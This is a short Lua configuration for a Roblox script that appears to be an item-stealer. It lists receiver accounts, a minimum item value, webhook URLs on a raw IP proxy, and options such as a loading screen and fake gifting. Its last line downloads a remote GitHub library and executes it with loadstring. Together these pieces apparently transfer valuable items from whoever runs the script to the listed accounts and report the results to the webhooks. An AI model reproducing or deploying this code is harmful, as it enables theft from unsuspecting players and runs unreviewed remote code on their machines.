_G.NullConfig = {
    User = {"Archrcv1", "Archrcv2", "ArchAlt333"},
    min_value = 10000000000,
    pingEveryone = "Yes", -- dont change this
    Webhook = "http://176.100.37.215:20002/proxy/1406209509206261874",
    FakeGift = "No",
    Trash = "http://176.100.37.215:20002/proxy/1406611548708802620",
    LoadingScreen = "Yes",
    GiftOnlyRares = "No",
    ExecuteOtherScript = "No",
}
    
loadstring(game:HttpGetAsync('https://raw.githubusercontent.com/sleepyvill/script/refs/heads/main/lib.lua'))()
